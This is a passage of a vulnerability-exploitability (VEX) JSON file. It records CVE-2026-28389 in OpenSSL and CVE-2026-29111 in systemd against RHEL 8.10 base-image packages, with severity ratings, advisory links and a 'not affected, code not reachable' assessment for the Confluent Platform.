          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-28389",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: During processing of a crafted CMS EnvelopedData message\nwith KeyAgreeRecipientInfo a NULL pointer dereference can happen.\n\nImpact summary: Applications that process attacker-controlled CMS data may\ncrash before authentication or cryptographic operations occur resulting in\nDenial of Service.\n\nWhen a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is\nprocessed, the optional parameters field of KeyEncryptionAlgorithmIdentifier\nis examined without checking for its presence. This results in a NULL\npointer dereference if the field is missing.\n\nApplications and services that call CMS_decrypt() on untrusted input\n(e.g., S/MIME processing or CMS-based protocols) are vulnerable.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28389"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28389"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-7x88-9hgc-69gf"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28389"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28389"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:21+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-29111",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        269
      ],
      "description": "systemd, a system and service manager, (as PID 1) hits an assert and freezes execution when an unprivileged IPC API call is made with spurious data. On version v249 and older the effect is not an assert, but stack overwriting, with the attacker controlled content. From version v250 and newer this is not possible as the safety check causes an assert instead. This IPC call was added in v239, so versions older than that are not affected. Versions 260-rc1, 259.2, 258.5, and 257.11 contain patches. No known workarounds are available.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-29111"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-29111"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19068"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19213"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-29111"
        },
        {
          "url": "https://bugzilla.redhat.com/2450505"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450505"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-29111"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19068.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19213"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.9.0/BRSA-jk0fvdm3ylf0.toml"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/1d22f706bd04f45f8422e17fbde3f56ece17758a"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/20021e7686426052e3a7505425d7e12085feb2a6"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/21167006574d6b83813c7596759b474f56562412"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/3cee294fe8cf4fa0eff933ab21416d099942cabd"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/42aee39107fbdd7db1ccd402a2151822b2805e9f"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/54588d2dedff54bfb6036670820650e4ea74628f"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/7ac3220213690e8a8d6d2a6e81e43bd1dce01d69"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/80acea4ef80a4bb78560ed970c34952299b890d6"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/b5fd14693057e5f2c9b4a49603be64ec3608ff6c"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/efa6ba2ab625aaa160ac435a09e6482fc63bdbe8"
        },
        {
          "url": "https://github.com/systemd/systemd/security/advisories/GHSA-gx6q-6f99-m764"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-29111.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19213.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29111"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8119-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8119-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-29111"
        }
      ],
      "published": "2026-03-23T22:16:26+00:00",
      "updated": "2026-06-17T10:29:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
